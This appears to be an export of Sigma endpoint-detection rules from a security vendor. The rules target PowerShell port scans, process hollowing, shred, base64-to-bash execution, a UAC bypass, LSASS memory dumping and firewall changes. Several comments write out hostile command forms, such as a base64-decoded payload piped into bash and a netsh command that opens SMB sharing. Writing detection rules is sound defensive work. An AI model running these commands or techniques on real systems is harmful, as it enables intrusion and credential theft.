"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604991Z",
"creation_date": "2026-03-23T11:45:34.604995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605002Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_powershell_port_list.yml",
"content": "title: Port Scan via PowerShell\nid: 6e840fce-0f8e-4009-8180-c6e416c31634\ndescription: |\n Detects PowerShell using System.Net.Sockets.TcpClient class to scan for outbound ports.\n Attackers can use PowerShell to do a portscan instead of using common tools like Nmap as it is built into Windows operating systems.\n It is recommended to verify if the PowerShell script is using this class legitimately. If so, it is recommended to create a whitelist for the identified script.\nreferences:\n - https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/\n - https://attack.mitre.org/techniques/T1016/\ndate: 2021/10/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.NetworkScan\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'New-Object'\n - 'System.Net.Sockets.TcpClient'\n - 'BeginConnect'\n - 'Connected'\n\n exclusion_vmware:\n PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\VMware.Sdk.Runtime\\\\*\\Extensions\\PowerShellCmdletsExtensions.ps1'\n PowershellCommand|contains|all:\n - 'A wrapper function for Invoke-WebRequest which gets content from a web page on the internet.'\n - 'function Invoke-WebRequestX {'\n - 'Retrieves the Certificate thumbprint for the specified remote host. Tcp and Ssl streams are used.'\n - 'function Get-TlsCertificateThumbprintFromRemoteHost {'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows\n exclusion_MDEClientAnalyzer:\n PowershellScriptPath|contains: 'MDEClientAnalyzer.ps1'\n PowershellCommand|contains|all:\n - '# This telnet test does not support proxy as-is'\n - 'Successfully connected to Host: $RemoteHost on Port: $Port'\n - 'function Write-ReportEvent('\n\n exclusion_test_port:\n PowershellCommand|contains|all:\n - 'function Test-Port'\n - 'https://boeprox.wordpress.org'\n - 'A. A. Milne (1882-1958)'\n - '#Create object for connecting to port on computer'\n\n exclusion_manageegine:\n ProcessParentImage|endswith: '\\ManageEngine\\M365 Manager Plus\\bin\\wrapper.exe'\n\n exclusion_m365_manager:\n ProcessImage: '?:\\ManagerEngine\\M365 Manager Plus\\jre\\bin\\java.exe'\n\n exclusion_vmware_sdk:\n PowershellScriptPath|contains: 'VMware.Sdk.Runtime\\Extensions\\PowerShellCmdletsExtensions.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e840fce-0f8e-4009-8180-c6e416c31634",
"rule_name": "Port Scan via PowerShell",
"rule_description": "Detects PowerShell using System.Net.Sockets.TcpClient class to scan for outbound ports.\nAttackers can use PowerShell to do a portscan instead of using common tools like Nmap as it is built into Windows operating systems.\nIt is recommended to verify if the PowerShell script is using this class legitimately. If so, it is recommended to create a whitelist for the identified script.\n",
"rule_creation_date": "2021-10-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e9abccd-a3c5-4c22-9f68-1657dd47857b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080987Z",
"creation_date": "2026-03-23T11:45:34.080989Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080994Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_ngen.yml",
"content": "title: Ngen.exe Sacrificial Process Spawned\nid: 6e9abccd-a3c5-4c22-9f68-1657dd47857b\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary ngen.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the ngen.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\ngen.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e9abccd-a3c5-4c22-9f68-1657dd47857b",
"rule_name": "Ngen.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary ngen.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the ngen.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6eae8f6d-99fb-45f9-a55d-94fc7e7110df",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628372Z",
"creation_date": "2026-03-23T11:45:34.628374Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628378Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/shred.1.html",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/techniques/T1485/"
],
"name": "t1485_execution_of_shred.yml",
"content": "title: Shred Execution\nid: 6eae8f6d-99fb-45f9-a55d-94fc7e7110df\ndescription: |\n Detects the execution of shred, a command to overwrite a file with random data to hide its content.\n Attackers can overwrite any files left by their malicious activities to prevent forensic analysis and slow the investigation process.\n It is recommended to analyze the process responsible for this action to look for malicious content or other malicious actions.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n\n selection_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? u'\n\n # This is handled by the rule 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\n filter_delete:\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_ansible:\n ProcessParentName: 'ansible-vault'\n\n condition: selection and (selection_space or not 1 of filter_*) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6eae8f6d-99fb-45f9-a55d-94fc7e7110df",
"rule_name": "Shred Execution",
"rule_description": "Detects the execution of shred, a command to overwrite a file with random data to hide its content.\nAttackers can overwrite any files left by their malicious activities to prevent forensic analysis and slow the investigation process.\nIt is recommended to analyze the process responsible for this action to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ec3565f-e7af-4e69-8d88-56a67f183e86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095300Z",
"creation_date": "2026-03-23T11:45:34.095302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_004_base64_bash_execution.yml",
"content": "title: Inline Base64 Content Execution via Bash\nid: 6ec3565f-e7af-4e69-8d88-56a67f183e86\ndescription: |\n Detects the execution of base64 encoded content in bash.\n Adversaries may use base64 to hide a malicious payload and evade security defenses.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2024/10/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1132.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Obfuscation\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n # /bin/zsh -c “echo -e WFVNS2JXNnNTM3c9J3RtcD0iJChta3R | base64 -D | /bin/bash\n Image|endswith:\n - '/bash'\n - '/zsh'\n - '/sh'\n # use regexp to eliminate multi-line script\n CommandLine|re: '^.*base64 +(-d|-D|--decode).*\\|.*sh$'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ec3565f-e7af-4e69-8d88-56a67f183e86",
"rule_name": "Inline Base64 Content Execution via Bash",
"rule_description": "Detects the execution of base64 encoded content in bash.\nAdversaries may use base64 to hide a malicious payload and evade security defenses.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073770Z",
"creation_date": "2026-03-23T11:45:34.073774Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073780Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.activecyber.us/activelabs/windows-uac-bypass",
"https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html",
"https://github.com/sailay1996/UAC_bypass_windows_store",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"
],
"name": "t1548_002_post_uac_bypass_wsreset.yml",
"content": "title: UAC Bypass Executed via WSReset\nid: 6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab\ndescription: |\n Detects a process being spawned by WSReset.exe.\n WSReset.exe has autoelevation capabilities and an integrity level of high.\n This is the result of an attack against a ShellExecuteW(\"ms-windows-store:PurgeCaches\") call inside WSReset.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to look for other alerts related to WSReset.exe UAC bypass preparation.\nreferences:\n - https://www.activecyber.us/activelabs/windows-uac-bypass\n - https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html\n - https://github.com/sailay1996/UAC_bypass_windows_store\n - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\ndate: 2020/10/12\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wsreset\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\WSReset.exe'\n\n filter:\n Image|endswith: 'Windows\\System32\\conhost.exe'\n\n exclusion_cliprenew:\n CommandLine:\n - 'cmd.exe /c %SystemRoot%\\system32\\ClipRenew.exe'\n - '?:\\WINDOWS\\system32\\cmd.exe /c %SystemRoot%\\system32\\ClipRenew.exe'\n\n condition: selection and not filter and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab",
"rule_name": "UAC Bypass Executed via WSReset",
"rule_description": "Detects a process being spawned by WSReset.exe.\nWSReset.exe has autoelevation capabilities and an integrity level of high.\nThis is the result of an attack against a ShellExecuteW(\"ms-windows-store:PurgeCaches\") call inside WSReset.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to look for other alerts related to WSReset.exe UAC bypass preparation.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ed761ef-dba9-462a-82b1-0154f3c13117",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078310Z",
"creation_date": "2026-03-23T11:45:34.078312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078316Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_with_rdrleakdiag.yml",
"content": "title: Process Memory Dumped via rdrleakdiag.exe\nid: 6ed761ef-dba9-462a-82b1-0154f3c13117\ndescription: |\n Detects a suspicious attempt to dump a process' memory using rdrleakdiag.exe.\n Rdrleakdiag.exe can be used as a LOLBin in order to dump the LSASS' process memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the process launching rdrleakdiag.exe for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen materials.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/09/12\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rdrleakdiag\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\rdrleakdiag.exe'\n - OriginalFileName: 'RdrLeakDiag.exe'\n\n selection_fullmemdmp:\n CommandLine|contains:\n - '/fullmemdmp'\n - '-fullmemdmp'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ed761ef-dba9-462a-82b1-0154f3c13117",
"rule_name": "Process Memory Dumped via rdrleakdiag.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using rdrleakdiag.exe.\nRdrleakdiag.exe can be used as a LOLBin in order to dump the LSASS' process memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to check the process launching rdrleakdiag.exe for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen materials.\n",
"rule_creation_date": "2022-09-12",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f2f1289-3da8-4c9c-a447-9fd95238d6b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079852Z",
"creation_date": "2026-03-23T11:45:34.079854Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079859Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1562_004_firewall_allow_file_printer.yml",
"content": "title: Share and Printer Traffic Enabled via netsh\nid: 6f2f1289-3da8-4c9c-a447-9fd95238d6b4\ndescription: |\n Detects a firewall filter modification that allows access to shares and printers over SMB.\n Allowing such traffic may allow adversaries to copy or access files over SMB shares but also to exploit vulnerabilities through newly exposed services, such as the spooler service.\n It is recommended to check for uncommon authentications or suspicious activity after the firewall rules were updated.\nreferences:\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2023/12/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'File'\n - 'Printer'\n - 'Sharing'\n - 'enable'\n\n # Exclusion for firewall activation\n # netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_general_electric_healthcare:\n ProcessParentImage|endswith: '\\VPAdmin.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'General Electric Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f2f1289-3da8-4c9c-a447-9fd95238d6b4",
"rule_name": "Share and Printer Traffic Enabled via netsh",
"rule_description": "Detects a firewall filter modification that allows access to shares and printers over SMB.\nAllowing such traffic may allow adversaries to copy or access files over SMB shares but also to exploit vulnerabilities through newly exposed services, such as the spooler service.\nIt is recommended to check for uncommon authentications or suspicious activity after the firewall rules were updated.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f370d2a-b65a-4e09-a924-93832490b998",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083773Z",
"creation_date": "2026-03-23T11:45:34.083775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083780Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_unsigned_connection_ip_tracker.yml",
"content": "title: DNS Request to IP Trackers from Unsigned Process\nid: 6f370d2a-b65a-4e09-a924-93832490b998\ndescription: |\n Detects a connection to an IP address tracker service such as ipinfo.io from an unsigned process.\n Adversaries can use such services to monitor their malware's spreading and track the IP addresses of infected hosts.\n It is recommended to check the legitimacy of the process performing the request as well as its parent.\nreferences:\n - https://attack.mitre.org/techniques/T1016/\ndate: 2023/06/19\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection_exact:\n QueryName:\n - 'ipinfo.io'\n - 'ip-api.com'\n - 'ip-api.org'\n - 'ip.me'\n - 'ipify.org'\n - 'seeip.org'\n - 'icanhazip.com'\n - 'canihazip.com'\n - 'ident.me'\n ProcessSigned: 'false'\n\n selection_subdomain:\n QueryName|endswith:\n - '.ipinfo.io'\n - '.ip-api.com'\n - '.ip-api.org'\n - '.ip.me'\n - '.ipify.org'\n - '.seeip.org'\n - '.icanhazip.com'\n - '.canihazip.com'\n - '.ident.me'\n ProcessSigned: 'false'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\modjo-livenotes\\app-*\\modjo-livenotes.exe'\n - '?:\\EES32\\\\ees.exe'\n - '?:\\users\\\\*\\appdata\\roaming\\insertlinks\\insertlinks.exe'\n - '?:\\Biesse\\bSuiteActionHandler\\bSuiteActionHandler.exe'\n - '?:\\Program Files (x86)\\Vidoc\\scrobbler\\VidocScrobbler.exe'\n - '?:\\Program Files\\Vidoc\\scrobbler\\VidocScrobbler.exe'\n - '?:\\Program Files (x86)\\WindowsApps\\Evernote.Evernote_*\\app\\Evernote.exe'\n - '?:\\Program Files\\WindowsApps\\Evernote.Evernote_*\\app\\Evernote.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Evernote\\Evernote.exe'\n - '?:\\program files\\lightbulb\\lightbulb.exe'\n - '?:\\users\\\\*\\appdata\\local\\ciscoereader\\app-*\\cisco-ereader.exe'\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files\\Fortify\\fortify.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\signitic\\Signitic.exe'\n - '?:\\Program Files\\WindowsApps\\\\*\\\\*.exe'\n - '?:\\Program Files\\NewBlueFX\\VegasStream\\VEGAS Stream.exe'\n - '?:\\Program Files (x86)\\Steam\\steamapps\\common\\Aim Lab\\AimLab_tb.exe'\n - '?:\\Program Files (x86)\\Steelcase\\RoomWizard Administrative Console\\RWAdmin.exe'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Program Files (x86)\\Raptor Technologies LLC\\RaptorHardwareService\\Raptorware.ClientService.Server.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\streamdeck\\plugins\\com.barraider.wintools.sdplugin\\com.barraider.wintools.exe'\n - '?:\\Program Files (x86)\\framiral\\avd\\avdstandalone.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Business Online SA *\\business online sa.exe'\n - 